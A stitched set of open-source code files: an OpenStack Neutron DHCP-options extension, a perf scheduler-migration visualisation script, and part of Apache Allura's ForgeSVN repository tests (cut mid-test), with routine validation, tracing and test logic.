suite15 = unittest.TestLoader().loadTestsFromTestCase(GetPremisesThatMatchConclusionArgsTestCase)
suite16 = unittest.TestLoader().loadTestsFromTestCase(combine_signatures_or_rename_predsTestCase)
suite17 = unittest.TestLoader().loadTestsFromTestCase(CategoryTestCase)
suites = unittest.TestSuite([suite1, suite2, suite3, suite4, suite5, suite6,
suite7, suite8, suite9, suite10, suite11, suite12,
suite13, suite14, suite15, suite16, suite17])
unittest.TextTestRunner(verbosity=2).run(suites)
| apache-2.0 |
apporc/neutron | neutron/extensions/extra_dhcp_opt.py | 5 | 3380 | # Copyright (c) 2013 OpenStack Foundation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from neutron._i18n import _
from neutron.api import extensions
from neutron.api.v2 import attributes as attr
from neutron.common import exceptions
# ExtraDHcpOpts Exceptions
class ExtraDhcpOptNotFound(exceptions.NotFound):
message = _("ExtraDhcpOpt %(id)s could not be found")
class ExtraDhcpOptBadData(exceptions.InvalidInput):
message = _("Invalid data format for extra-dhcp-opt: %(data)s")
# Valid blank extra dhcp opts
VALID_BLANK_EXTRA_DHCP_OPTS = ('router', 'classless-static-route')
# Common definitions for maximum string field length
DHCP_OPT_NAME_MAX_LEN = 64
DHCP_OPT_VALUE_MAX_LEN = 255
EXTRA_DHCP_OPT_KEY_SPECS = {
'id': {'type:uuid': None, 'required': False},
'opt_name': {'type:not_empty_string': DHCP_OPT_NAME_MAX_LEN,
'required': True},
'opt_value': {'type:not_empty_string_or_none': DHCP_OPT_VALUE_MAX_LEN,
'required': True},
'ip_version': {'convert_to': attr.convert_to_int,
'type:values': [4, 6],
'required': False}
}
def _validate_extra_dhcp_opt(data, key_specs=None):
if data is not None:
if not isinstance(data, list):
raise ExtraDhcpOptBadData(data=data)
for d in data:
if d['opt_name'] in VALID_BLANK_EXTRA_DHCP_OPTS:
msg = attr._validate_string_or_none(d['opt_value'],
DHCP_OPT_VALUE_MAX_LEN)
else:
msg = attr._validate_dict(d, key_specs)
if msg:
raise ExtraDhcpOptBadData(data=msg)
attr.validators['type:list_of_extra_dhcp_opts'] = _validate_extra_dhcp_opt
# Attribute Map
EXTRADHCPOPTS = 'extra_dhcp_opts'
CLIENT_ID = "client-id"
EXTENDED_ATTRIBUTES_2_0 = {
'ports': {
EXTRADHCPOPTS: {
'allow_post': True,
'allow_put': True,
'is_visible': True,
'default': None,
'validate': {
'type:list_of_extra_dhcp_opts': EXTRA_DHCP_OPT_KEY_SPECS
}
}
}
}
class Extra_dhcp_opt(extensions.ExtensionDescriptor):
@classmethod
def get_name(cls):
return "Neutron Extra DHCP opts"
@classmethod
def get_alias(cls):
return "extra_dhcp_opt"
@classmethod
def get_description(cls):
return ("Extra options configuration for DHCP. "
"For example PXE boot options to DHCP clients can "
"be specified (e.g. tftp-server, server-ip-address, "
"bootfile-name)")
@classmethod
def get_updated(cls):
return "2013-03-17T12:00:00-00:00"
def get_extended_resources(self, version):
if version == "2.0":
return EXTENDED_ATTRIBUTES_2_0
else:
return {}
| apache-2.0 |
lucaspcamargo/litmus-rt | tools/perf/scripts/python/sched-migration.py | 1910 | 11965 | #!/usr/bin/python
#
# Cpu task migration overview toy
#
# Copyright (C) 2010 Frederic Weisbecker <[email protected]>
#
# perf script event handlers have been generated by perf script -g python
#
# This software is distributed under the terms of the GNU General
# Public License ("GPL") version 2 as published by the Free Software
# Foundation.
import os
import sys
from collections import defaultdict
from UserList import UserList
sys.path.append(os.environ['PERF_EXEC_PATH'] + \
'/scripts/python/Perf-Trace-Util/lib/Perf/Trace')
sys.path.append('scripts/python/Perf-Trace-Util/lib/Perf/Trace')
from perf_trace_context import *
from Core import *
from SchedGui import *
threads = { 0 : "idle"}
def thread_name(pid):
return "%s:%d" % (threads[pid], pid)
class RunqueueEventUnknown:
@staticmethod
def color():
return None
def __repr__(self):
return "unknown"
class RunqueueEventSleep:
@staticmethod
def color():
return (0, 0, 0xff)
def __init__(self, sleeper):
self.sleeper = sleeper
def __repr__(self):
return "%s gone to sleep" % thread_name(self.sleeper)
class RunqueueEventWakeup:
@staticmethod
def color():
return (0xff, 0xff, 0)
def __init__(self, wakee):
self.wakee = wakee
def __repr__(self):
return "%s woke up" % thread_name(self.wakee)
class RunqueueEventFork:
@staticmethod
def color():
return (0, 0xff, 0)
def __init__(self, child):
self.child = child
def __repr__(self):
return "new forked task %s" % thread_name(self.child)
class RunqueueMigrateIn:
@staticmethod
def color():
return (0, 0xf0, 0xff)
def __init__(self, new):
self.new = new
def __repr__(self):
return "task migrated in %s" % thread_name(self.new)
class RunqueueMigrateOut:
@staticmethod
def color():
return (0xff, 0, 0xff)
def __init__(self, old):
self.old = old
def __repr__(self):
return "task migrated out %s" % thread_name(self.old)
class RunqueueSnapshot:
def __init__(self, tasks = [0], event = RunqueueEventUnknown()):
self.tasks = tuple(tasks)
self.event = event
def sched_switch(self, prev, prev_state, next):
event = RunqueueEventUnknown()
if taskState(prev_state) == "R" and next in self.tasks \
and prev in self.tasks:
return self
if taskState(prev_state) != "R":
event = RunqueueEventSleep(prev)
next_tasks = list(self.tasks[:])
if prev in self.tasks:
if taskState(prev_state) != "R":
next_tasks.remove(prev)
elif taskState(prev_state) == "R":
next_tasks.append(prev)
if next not in next_tasks:
next_tasks.append(next)
return RunqueueSnapshot(next_tasks, event)
def migrate_out(self, old):
if old not in self.tasks:
return self
next_tasks = [task for task in self.tasks if task != old]
return RunqueueSnapshot(next_tasks, RunqueueMigrateOut(old))
def __migrate_in(self, new, event):
if new in self.tasks:
self.event = event
return self
next_tasks = self.tasks[:] + tuple([new])
return RunqueueSnapshot(next_tasks, event)
def migrate_in(self, new):
return self.__migrate_in(new, RunqueueMigrateIn(new))
def wake_up(self, new):
return self.__migrate_in(new, RunqueueEventWakeup(new))
def wake_up_new(self, new):
return self.__migrate_in(new, RunqueueEventFork(new))
def load(self):
""" Provide the number of tasks on the runqueue.
Don't count idle"""
return len(self.tasks) - 1
def __repr__(self):
ret = self.tasks.__repr__()
ret += self.origin_tostring()
return ret
class TimeSlice:
def __init__(self, start, prev):
self.start = start
self.prev = prev
self.end = start
# cpus that triggered the event
self.event_cpus = []
if prev is not None:
self.total_load = prev.total_load
self.rqs = prev.rqs.copy()
else:
self.rqs = defaultdict(RunqueueSnapshot)
self.total_load = 0
def __update_total_load(self, old_rq, new_rq):
diff = new_rq.load() - old_rq.load()
self.total_load += diff
def sched_switch(self, ts_list, prev, prev_state, next, cpu):
old_rq = self.prev.rqs[cpu]
new_rq = old_rq.sched_switch(prev, prev_state, next)
if old_rq is new_rq:
return
self.rqs[cpu] = new_rq
self.__update_total_load(old_rq, new_rq)
ts_list.append(self)
self.event_cpus = [cpu]
def migrate(self, ts_list, new, old_cpu, new_cpu):
if old_cpu == new_cpu:
return
old_rq = self.prev.rqs[old_cpu]
out_rq = old_rq.migrate_out(new)
self.rqs[old_cpu] = out_rq
self.__update_total_load(old_rq, out_rq)
new_rq = self.prev.rqs[new_cpu]
in_rq = new_rq.migrate_in(new)
self.rqs[new_cpu] = in_rq
self.__update_total_load(new_rq, in_rq)
ts_list.append(self)
if old_rq is not out_rq:
self.event_cpus.append(old_cpu)
self.event_cpus.append(new_cpu)
def wake_up(self, ts_list, pid, cpu, fork):
old_rq = self.prev.rqs[cpu]
if fork:
new_rq = old_rq.wake_up_new(pid)
else:
new_rq = old_rq.wake_up(pid)
if new_rq is old_rq:
return
self.rqs[cpu] = new_rq
self.__update_total_load(old_rq, new_rq)
ts_list.append(self)
self.event_cpus = [cpu]
def next(self, t):
self.end = t
return TimeSlice(t, self)
class TimeSliceList(UserList):
def __init__(self, arg = []):
self.data = arg
def get_time_slice(self, ts):
if len(self.data) == 0:
slice = TimeSlice(ts, TimeSlice(-1, None))
else:
slice = self.data[-1].next(ts)
return slice
def find_time_slice(self, ts):
start = 0
end = len(self.data)
found = -1
searching = True
while searching:
if start == end or start == end - 1:
searching = False
i = (end + start) / 2
if self.data[i].start <= ts and self.data[i].end >= ts:
found = i
end = i
continue
if self.data[i].end < ts:
start = i
elif self.data[i].start > ts:
end = i
return found
def set_root_win(self, win):
self.root_win = win
def mouse_down(self, cpu, t):
idx = self.find_time_slice(t)
if idx == -1:
return
ts = self[idx]
rq = ts.rqs[cpu]
raw = "CPU: %d\n" % cpu
raw += "Last event : %s\n" % rq.event.__repr__()
raw += "Timestamp : %d.%06d\n" % (ts.start / (10 ** 9), (ts.start % (10 ** 9)) / 1000)
raw += "Duration : %6d us\n" % ((ts.end - ts.start) / (10 ** 6))
raw += "Load = %d\n" % rq.load()
for t in rq.tasks:
raw += "%s \n" % thread_name(t)
self.root_win.update_summary(raw)
def update_rectangle_cpu(self, slice, cpu):
rq = slice.rqs[cpu]
if slice.total_load != 0:
load_rate = rq.load() / float(slice.total_load)
else:
load_rate = 0
red_power = int(0xff - (0xff * load_rate))
color = (0xff, red_power, red_power)
top_color = None
if cpu in slice.event_cpus:
top_color = rq.event.color()
self.root_win.paint_rectangle_zone(cpu, color, top_color, slice.start, slice.end)
def fill_zone(self, start, end):
i = self.find_time_slice(start)
if i == -1:
return
for i in xrange(i, len(self.data)):
timeslice = self.data[i]
if timeslice.start > end:
return
for cpu in timeslice.rqs:
self.update_rectangle_cpu(timeslice, cpu)
def interval(self):
if len(self.data) == 0:
return (0, 0)
return (self.data[0].start, self.data[-1].end)
def nr_rectangles(self):
last_ts = self.data[-1]
max_cpu = 0
for cpu in last_ts.rqs:
if cpu > max_cpu:
max_cpu = cpu
return max_cpu
class SchedEventProxy:
def __init__(self):
self.current_tsk = defaultdict(lambda : -1)
self.timeslices = TimeSliceList()
def sched_switch(self, headers, prev_comm, prev_pid, prev_prio, prev_state,
next_comm, next_pid, next_prio):
""" Ensure the task we sched out this cpu is really the one
we logged. Otherwise we may have missed traces """
on_cpu_task = self.current_tsk[headers.cpu]
if on_cpu_task != -1 and on_cpu_task != prev_pid:
print "Sched switch event rejected ts: %s cpu: %d prev: %s(%d) next: %s(%d)" % \
(headers.ts_format(), headers.cpu, prev_comm, prev_pid, next_comm, next_pid)
threads[prev_pid] = prev_comm
threads[next_pid] = next_comm
self.current_tsk[headers.cpu] = next_pid
ts = self.timeslices.get_time_slice(headers.ts())
ts.sched_switch(self.timeslices, prev_pid, prev_state, next_pid, headers.cpu)
def migrate(self, headers, pid, prio, orig_cpu, dest_cpu):
ts = self.timeslices.get_time_slice(headers.ts())
ts.migrate(self.timeslices, pid, orig_cpu, dest_cpu)
def wake_up(self, headers, comm, pid, success, target_cpu, fork):
if success == 0:
return
ts = self.timeslices.get_time_slice(headers.ts())
ts.wake_up(self.timeslices, pid, target_cpu, fork)
def trace_begin():
global parser
parser = SchedEventProxy()
def trace_end():
app = wx.App(False)
timeslices = parser.timeslices
frame = RootFrame(timeslices, "Migration")
app.MainLoop()
def sched__sched_stat_runtime(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
common_callchain, comm, pid, runtime, vruntime):
pass
def sched__sched_stat_iowait(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
common_callchain, comm, pid, delay):
pass
def sched__sched_stat_sleep(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
common_callchain, comm, pid, delay):
pass
def sched__sched_stat_wait(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
common_callchain, comm, pid, delay):
pass
def sched__sched_process_fork(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
common_callchain, parent_comm, parent_pid, child_comm, child_pid):
pass
def sched__sched_process_wait(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
common_callchain, comm, pid, prio):
pass
def sched__sched_process_exit(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
common_callchain, comm, pid, prio):
pass
def sched__sched_process_free(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
common_callchain, comm, pid, prio):
pass
def sched__sched_migrate_task(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
common_callchain, comm, pid, prio, orig_cpu,
dest_cpu):
headers = EventHeaders(common_cpu, common_secs, common_nsecs,
common_pid, common_comm, common_callchain)
parser.migrate(headers, pid, prio, orig_cpu, dest_cpu)
def sched__sched_switch(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm, common_callchain,
prev_comm, prev_pid, prev_prio, prev_state,
next_comm, next_pid, next_prio):
headers = EventHeaders(common_cpu, common_secs, common_nsecs,
common_pid, common_comm, common_callchain)
parser.sched_switch(headers, prev_comm, prev_pid, prev_prio, prev_state,
next_comm, next_pid, next_prio)
def sched__sched_wakeup_new(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
common_callchain, comm, pid, prio, success,
target_cpu):
headers = EventHeaders(common_cpu, common_secs, common_nsecs,
common_pid, common_comm, common_callchain)
parser.wake_up(headers, comm, pid, success, target_cpu, 1)
def sched__sched_wakeup(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
common_callchain, comm, pid, prio, success,
target_cpu):
headers = EventHeaders(common_cpu, common_secs, common_nsecs,
common_pid, common_comm, common_callchain)
parser.wake_up(headers, comm, pid, success, target_cpu, 0)
def sched__sched_wait_task(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
common_callchain, comm, pid, prio):
pass
def sched__sched_kthread_stop_ret(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
common_callchain, ret):
pass
def sched__sched_kthread_stop(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
common_callchain, comm, pid):
pass
def trace_unhandled(event_name, context, event_fields_dict):
pass
| gpl-2.0 |
apache/incubator-allura | ForgeSVN/forgesvn/tests/model/test_repository.py | 1 | 44587 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import os
import shutil
import unittest
import pkg_resources
from itertools import count, product
from datetime import datetime
from zipfile import ZipFile
from collections import defaultdict
from pylons import tmpl_context as c, app_globals as g
import mock
from nose.tools import assert_equal
import tg
import ming
from ming.base import Object
from ming.orm import session, ThreadLocalORMSession
from testfixtures import TempDirectory
from IPython.testing.decorators import onlyif
from alluratest.controller import setup_basic_test, setup_global_objects
from allura import model as M
from allura.model.repo_refresh import send_notifications
from allura.lib import helpers as h
from allura.tests.model.test_repo import RepoImplTestBase
from forgesvn import model as SM
from forgesvn.model.svn import svn_path_exists
from forgesvn.tests import with_svn
from allura.tests.decorators import with_tool
class TestNewRepo(unittest.TestCase):
def setUp(self):
setup_basic_test()
self.setup_with_tools()
@with_svn
def setup_with_tools(self):
setup_global_objects()
h.set_context('test', 'src', neighborhood='Projects')
repo_dir = pkg_resources.resource_filename(
'forgesvn', 'tests/data/')
self.repo = SM.Repository(
name='testsvn',
fs_path=repo_dir,
url_path='/test/',
tool='svn',
status='creating')
self.repo.refresh()
self.rev = self.repo.commit('HEAD')
ThreadLocalORMSession.flush_all()
ThreadLocalORMSession.close_all()
def test_last_commit_for(self):
tree = self.rev.tree
for row in tree.ls():
assert row['last_commit']['author'] is not None
def test_commit(self):
assert self.rev.primary() is self.rev
assert self.rev.index_id().startswith('allura/model/repo/Commit#')
self.rev.author_url
self.rev.committer_url
assert self.rev.tree._id == self.rev.tree_id
assert self.rev.shorthand_id() == '[r6]'
assert self.rev.symbolic_ids == ([], [])
assert self.rev.url() == (
'/p/test/src/6/')
all_cis = list(self.repo.log(self.rev._id))
assert len(all_cis) == 6
self.rev.tree.ls()
assert self.rev.tree.readme() == (
'README', 'This is readme\nAnother Line\n')
assert self.rev.tree.path() == '/'
assert self.rev.tree.url() == (
'/p/test/src/6/tree/')
self.rev.tree.by_name['README']
assert self.rev.tree.is_blob('README') == True
assert self.rev.tree['a']['b']['c'].ls() == []
self.assertRaises(KeyError, lambda: self.rev.tree['a']['b']['d'])
class TestSVNRepo(unittest.TestCase, RepoImplTestBase):
def setUp(self):
setup_basic_test()
self.setup_with_tools()
@with_svn
@with_tool('test', 'SVN', 'svn-tags', 'SVN with tags')
def setup_with_tools(self):
setup_global_objects()
h.set_context('test', 'src', neighborhood='Projects')
repo_dir = pkg_resources.resource_filename(
'forgesvn', 'tests/data/')
self.repo = SM.Repository(
name='testsvn',
fs_path=repo_dir,
url_path='/test/',
tool='svn',
status='creating')
self.repo.refresh()
self.svn_tags = SM.Repository(
name='testsvn-trunk-tags-branches',
fs_path=repo_dir,
url_path='/test/',
tool='svn',
status='creating')
self.svn_tags.refresh()
ThreadLocalORMSession.flush_all()
ThreadLocalORMSession.close_all()
def test_init(self):
repo = SM.Repository(
name='testsvn',
fs_path=g.tmpdir + '/',
url_path='/test/',
tool='svn',
status='creating')
dirname = os.path.join(repo.fs_path, repo.name)
if os.path.exists(dirname):
shutil.rmtree(dirname)
repo.init()
shutil.rmtree(dirname)
def test_fork(self):
repo = SM.Repository(
name='testsvn',
fs_path=g.tmpdir + '/',
url_path='/test/',
tool='svn',
status='creating')
repo_path = pkg_resources.resource_filename(
'forgesvn', 'tests/data/testsvn')
dirname = os.path.join(repo.fs_path, repo.name)
if os.path.exists(dirname):
shutil.rmtree(dirname)
repo.init()
repo._impl.clone_from('file://' + repo_path)
assert not os.path.exists(
os.path.join(g.tmpdir, 'testsvn/hooks/pre-revprop-change'))
assert os.path.exists(
os.path.join(g.tmpdir, 'testsvn/hooks/post-commit'))
assert os.access(
os.path.join(g.tmpdir, 'testsvn/hooks/post-commit'), os.X_OK)
with open(os.path.join(g.tmpdir, 'testsvn/hooks/post-commit')) as f:
hook_data = f.read()
self.assertIn(
'curl -s http://localhost/auth/refresh_repo/p/test/src/\n',
hook_data)
self.assertIn('exec $DIR/post-commit-user "$@"\n', hook_data)
repo.refresh(notify=False)
assert len(list(repo.log()))
shutil.rmtree(dirname)
@mock.patch('forgesvn.model.svn.tg')
def test_can_hotcopy(self, tg):
from forgesvn.model.svn import SVNImplementation
func = SVNImplementation.can_hotcopy
obj = mock.Mock(spec=SVNImplementation)
for combo in product(
['file:///myfile', 'http://myfile'],
[True, False],
['version 1.7', 'version 1.6', 'version 2.0.3']):
source_url = combo[0]
tg.config = {'scm.svn.hotcopy': combo[1]}
stdout = combo[2]
obj.check_call.return_value = stdout, ''
expected = (source_url.startswith('file://') and
tg.config['scm.svn.hotcopy'] and
stdout != 'version 1.6')
result = func(obj, source_url)
assert result == expected
@mock.patch('forgesvn.model.svn.g.post_event')
def test_clone(self, post_event):
repo = SM.Repository(
name='testsvn',
fs_path=g.tmpdir + '/',
url_path='/test/',
tool='svn',
status='creating')
repo_path = pkg_resources.resource_filename(
'forgesvn', 'tests/data/testsvn')
dirname = os.path.join(repo.fs_path, repo.name)
if os.path.exists(dirname):
shutil.rmtree(dirname)
repo.init()
repo._impl.clone_from('file://' + repo_path)
assert not os.path.exists(
os.path.join(g.tmpdir, 'testsvn/hooks/pre-revprop-change'))
assert os.path.exists(
os.path.join(g.tmpdir, 'testsvn/hooks/post-commit'))
assert os.access(
os.path.join(g.tmpdir, 'testsvn/hooks/post-commit'), os.X_OK)
with open(os.path.join(g.tmpdir, 'testsvn/hooks/post-commit')) as f:
c = f.read()
self.assertIn(
'curl -s http://localhost/auth/refresh_repo/p/test/src/\n', c)
self.assertIn('exec $DIR/post-commit-user "$@"\n', c)
repo.refresh(notify=False)
assert len(list(repo.log()))
shutil.rmtree(dirname)
def test_index(self):
i = self.repo.index()
assert i['type_s'] == 'SVN Repository', i
def test_log_id_only(self):
entries = list(self.repo.log(id_only=True))
assert_equal(entries, [6, 5, 4, 3, 2, 1])
def test_log(self):
entries = list(self.repo.log(id_only=False))
assert_equal(entries, [
{'parents': [5],
'refs': ['HEAD'],
'committed': {
'date': datetime(2013, 11, 8, 13, 38, 11, 152821),
'name': u'coldmind', 'email': ''},
'message': u'',
'rename_details': {},
'id': 6,
'authored': {
'date': datetime(2013, 11, 8, 13, 38, 11, 152821),
'name': u'coldmind',
'email': ''
}, 'size': 0},
{'parents': [4],
'refs': [],
'committed': {
'date': datetime(2010, 11, 18, 20, 14, 21, 515743),
'name': u'rick446',
'email': ''},
'message': u'Copied a => b',
'rename_details': {},
'id': 5,
'authored': {
'date': datetime(2010, 11, 18, 20, 14, 21, 515743),
'name': u'rick446',
'email': ''},
'size': 0},
{'parents': [3],
'refs': [],
'committed': {
'date': datetime(2010, 10, 8, 15, 32, 59, 383719),
'name': u'rick446',
'email': ''},
'message': u'Remove hello.txt',
'rename_details': {},
'id': 4,
'authored': {
'date': datetime(2010, 10, 8, 15, 32, 59, 383719),
'name': u'rick446',
'email': ''},
'size': 0},
{'parents': [2],
'refs': [],
'committed': {
'date': datetime(2010, 10, 8, 15, 32, 48, 272296),
'name': u'rick446',
'email': ''},
'message': u'Modify readme',
'rename_details': {},
'id': 3,
'authored':
{'date': datetime(2010, 10, 8, 15, 32, 48, 272296),
'name': u'rick446',
'email': ''},
'size': 0},
{'parents': [1],
'refs': [],
'committed': {
'date': datetime(2010, 10, 8, 15, 32, 36, 221863),
'name': u'rick446',
'email': ''},
'message': u'Add path',
'rename_details': {},
'id': 2,
'authored': {
'date': datetime(2010, 10, 8, 15, 32, 36, 221863),
'name': u'rick446',
'email': ''},
'size': 0},
{'parents': [],
'refs': [],
'committed': {
'date': datetime(2010, 10, 8, 15, 32, 7, 238375),
'name': u'rick446',
'email': ''},
'message': u'Create readme',
'rename_details': {},
'id': 1,
'authored': {
'date': datetime(2010, 10, 8, 15, 32, 7, 238375),
'name': u'rick446',
'email': ''},
'size': 0}])
def test_log_file(self):
entries = list(self.repo.log(path='/README', id_only=False))
assert_equal(entries, [
{'authored': {'date': datetime(2010, 10, 8, 15, 32, 48, 272296),
'email': '',
'name': u'rick446'},
'committed': {'date': datetime(2010, 10, 8, 15, 32, 48, 272296),
'email': '',
'name': u'rick446'},
'id': 3,
'message': u'Modify readme',
'parents': [2],
'refs': [],
'size': 28,
'rename_details': {}},
{'authored': {'date': datetime(2010, 10, 8, 15, 32, 7, 238375),
'email': '',
'name': u'rick446'},
'committed': {'date': datetime(2010, 10, 8, 15, 32, 7, 238375),
'email': '',
'name': u'rick446'},
'id': 1,
'message': u'Create readme',
'parents': [],
'refs': [],
'size': 15,
'rename_details': {}},
])
def test_is_file(self):
assert self.repo.is_file('/README')
assert not self.repo.is_file('/a')
def test_paged_diffs(self):
entry = self.repo.commit(self.repo.log(2, id_only=True).next())
self.assertEqual(entry.diffs, entry.paged_diffs())
self.assertEqual(entry.diffs, entry.paged_diffs(start=0))
added_expected = entry.diffs.added[1:3]
expected = dict(
copied=[], changed=[], removed=[],
added=added_expected, total=4)
actual = entry.paged_diffs(start=1, end=3)
self.assertEqual(expected, actual)
empty = M.repo.Commit().paged_diffs()
self.assertEqual(sorted(actual.keys()), sorted(empty.keys()))
def test_diff_create_file(self):
entry = self.repo.commit(self.repo.log(1, id_only=True).next())
self.assertEqual(
entry.diffs, dict(
copied=[], changed=[],
removed=[], added=['/README'], total=1))
def test_diff_create_path(self):
entry = self.repo.commit(self.repo.log(2, id_only=True).next())
actual = entry.diffs
actual.added = sorted(actual.added)
self.assertEqual(
entry.diffs, dict(
copied=[], changed=[], removed=[],
added=sorted([
'/a', '/a/b', '/a/b/c',
'/a/b/c/hello.txt']), total=4))
def test_diff_modify_file(self):
entry = self.repo.commit(self.repo.log(3, id_only=True).next())
self.assertEqual(
entry.diffs, dict(
copied=[], changed=['/README'],
removed=[], added=[], total=1))
def test_diff_delete(self):
entry = self.repo.commit(self.repo.log(4, id_only=True).next())
self.assertEqual(
entry.diffs, dict(
copied=[], changed=[],
removed=['/a/b/c/hello.txt'], added=[], total=1))
def test_diff_copy(self):
# Copies are currently only detected as 'add'
entry = self.repo.commit(self.repo.log(5, id_only=True).next())
self.assertEqual(
entry.diffs, dict(
copied=[], changed=[],
removed=[], added=['/b'], total=1))
def test_commit(self):
entry = self.repo.commit(1)
assert entry.committed.name == 'rick446'
assert entry.message
def test_svn_path_exists(self):
repo_path = pkg_resources.resource_filename(
'forgesvn', 'tests/data/testsvn')
assert svn_path_exists("file://%s/a" % repo_path)
assert svn_path_exists("file://%s" % repo_path)
assert not svn_path_exists("file://%s/badpath" % repo_path)
with mock.patch('forgesvn.model.svn.pysvn') as pysvn:
svn_path_exists('dummy')
pysvn.Client.return_value.info2.assert_called_once_with(
'dummy',
revision=pysvn.Revision.return_value,
recurse=False)
@onlyif(os.path.exists(tg.config.get('scm.repos.tarball.zip_binary', '/usr/bin/zip')), 'zip binary is missing')
def test_tarball(self):
tmpdir = tg.config['scm.repos.tarball.root']
assert_equal(self.repo.tarball_path,
os.path.join(tmpdir, 'svn/t/te/test/testsvn'))
assert_equal(self.repo.tarball_url('1'),
'file:///svn/t/te/test/testsvn/test-src-1.zip')
self.repo.tarball('1')
assert os.path.isfile(
os.path.join(tmpdir, "svn/t/te/test/testsvn/test-src-1.zip"))
tarball_zip = ZipFile(
os.path.join(tmpdir, 'svn/t/te/test/testsvn/test-src-1.zip'), 'r')
assert_equal(tarball_zip.namelist(),
['test-src-1/', 'test-src-1/README'])
shutil.rmtree(self.repo.tarball_path.encode('utf-8'),
ignore_errors=True)
@onlyif(os.path.exists(tg.config.get('scm.repos.tarball.zip_binary', '/usr/bin/zip')), 'zip binary is missing')
def test_tarball_aware_of_tags(self):
rev = '19'
tag_content = sorted(['test-svn-tags-19-tags-tag-1.0/',
'test-svn-tags-19-tags-tag-1.0/svn-commit.tmp',
'test-svn-tags-19-tags-tag-1.0/README'])
h.set_context('test', 'svn-tags', neighborhood='Projects')
tmpdir = tg.config['scm.repos.tarball.root']
tarball_path = os.path.join(
tmpdir, 'svn/t/te/test/testsvn-trunk-tags-branches/')
fn = tarball_path + 'test-svn-tags-19-tags-tag-1.0.zip'
self.svn_tags.tarball(rev, '/tags/tag-1.0/')
assert os.path.isfile(fn), fn
snapshot = ZipFile(fn, 'r')
assert_equal(sorted(snapshot.namelist()), tag_content)
os.remove(fn)
self.svn_tags.tarball(rev, '/tags/tag-1.0/some/path/')
assert os.path.isfile(fn), fn
snapshot = ZipFile(fn, 'r')
assert_equal(sorted(snapshot.namelist()), tag_content)
os.remove(fn)
# if inside of tags, but no tag is specified
# expect snapshot of trunk
fn = tarball_path + 'test-svn-tags-19-trunk.zip'
self.svn_tags.tarball(rev, '/tags/')
assert os.path.isfile(fn), fn
snapshot = ZipFile(fn, 'r')
assert_equal(sorted(snapshot.namelist()),
sorted(['test-svn-tags-19-trunk/',
'test-svn-tags-19-trunk/aaa.txt',
'test-svn-tags-19-trunk/bbb.txt',
'test-svn-tags-19-trunk/ccc.txt',
'test-svn-tags-19-trunk/README']))
shutil.rmtree(tarball_path, ignore_errors=True)
@onlyif(os.path.exists(tg.config.get('scm.repos.tarball.zip_binary', '/usr/bin/zip')), 'zip binary is missing')
def test_tarball_aware_of_branches(self):
rev = '19'
branch_content = sorted(['test-svn-tags-19-branches-aaa/',
'test-svn-tags-19-branches-aaa/aaa.txt',
'test-svn-tags-19-branches-aaa/svn-commit.tmp',
'test-svn-tags-19-branches-aaa/README'])
h.set_context('test', 'svn-tags', neighborhood='Projects')
tmpdir = tg.config['scm.repos.tarball.root']
tarball_path = os.path.join(
tmpdir, 'svn/t/te/test/testsvn-trunk-tags-branches/')
fn = tarball_path + 'test-svn-tags-19-branches-aaa.zip'
self.svn_tags.tarball(rev, '/branches/aaa/')
assert os.path.isfile(fn), fn
snapshot = ZipFile(fn, 'r')
assert_equal(sorted(snapshot.namelist()), branch_content)
os.remove(fn)
self.svn_tags.tarball(rev, '/branches/aaa/some/path/')
assert os.path.isfile(fn), fn
snapshot = ZipFile(fn, 'r')
assert_equal(sorted(snapshot.namelist()), branch_content)
os.remove(fn)
# if inside of branches, but no branch is specified
# expect snapshot of trunk
fn = tarball_path + 'test-svn-tags-19-trunk.zip'
self.svn_tags.tarball(rev, '/branches/')
assert os.path.isfile(fn), fn
snapshot = ZipFile(fn, 'r')
assert_equal(sorted(snapshot.namelist()),
sorted(['test-svn-tags-19-trunk/',
'test-svn-tags-19-trunk/aaa.txt',
'test-svn-tags-19-trunk/bbb.txt',
'test-svn-tags-19-trunk/ccc.txt',
'test-svn-tags-19-trunk/README']))
shutil.rmtree(tarball_path, ignore_errors=True)
@onlyif(os.path.exists(tg.config.get('scm.repos.tarball.zip_binary', '/usr/bin/zip')), 'zip binary is missing')
def test_tarball_aware_of_trunk(self):
rev = '19'
trunk_content = sorted(['test-svn-tags-19-trunk/',
'test-svn-tags-19-trunk/aaa.txt',
'test-svn-tags-19-trunk/bbb.txt',
'test-svn-tags-19-trunk/ccc.txt',
'test-svn-tags-19-trunk/README'])
h.set_context('test', 'svn-tags', neighborhood='Projects')
tmpdir = tg.config['scm.repos.tarball.root']
tarball_path = os.path.join(
tmpdir, 'svn/t/te/test/testsvn-trunk-tags-branches/')
fn = tarball_path + 'test-svn-tags-19-trunk.zip'
self.svn_tags.tarball(rev, '/trunk/')
